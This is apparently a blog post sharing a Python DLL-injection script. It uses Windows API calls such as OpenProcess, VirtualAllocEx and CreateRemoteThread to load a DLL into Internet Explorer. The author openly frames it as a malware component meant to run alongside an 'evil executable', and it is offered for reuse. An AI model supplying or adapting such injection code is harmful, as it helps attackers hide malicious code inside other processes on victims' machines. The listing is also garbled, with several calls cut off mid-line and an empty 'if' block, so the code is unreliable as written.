I've made a script that will attempt to inject a predefined dll into the Internet Explorer process on Windows. One application could be in malware, this script assumes you have a dll called mydll.dll in the same directory as the script.(Presumably where it was downloaded in combination with your evil executable[After you have compiled the script]).
The formatting is a little unconventional because i had a 'print' after each operation in the script for testing purposes which have since been removed. Save for the final print which for your convenience together with the last 'else' can be commented out. Here's the code for the script:
from win32com.client import GetObject
from ctypes import *
import sys, ctypes, os, string, time
Wmi = GetObject('winmgmts:')
processes = Wmi.InstancesOf('Win32_Process')
# Get the IE process
explorer = Wmi.ExecQuery('select * from Win32_Process where Name="iexplore.exe"')
# Grab its Pid
PID = explorer.Properties_('ProcessId').Value
# Get DLL path
file = 'mydll.dll'
path = os.path.dirname(__file__)
DLL_PATH = os.path.join(path, file)
# Define constants we use
PAGE_RW_PRIV = 0x04
PROCESS_ALL_ACCESS = 0x1F0FFF
VIRTUAL_MEM = 0x3000
kernel32 = windll.kernel32
LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH
hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)
if hProcess == None:
DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess,
bool_Written = c_int(0)
kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")
LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")
thread_id = c_ulong(0) # for our thread id
if not kernel32.CreateRemoteThread(hProcess,
print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value
Alternatively you can check the script out and download it via github by following this link. https://github.com/FernSecurity/DLL-Injector
I've tested it on Windows 7 but it should be able to inject the dll into any Win32 process.
Feel free to modify and/or improve the script if you happen to do so, i'd love to see your work!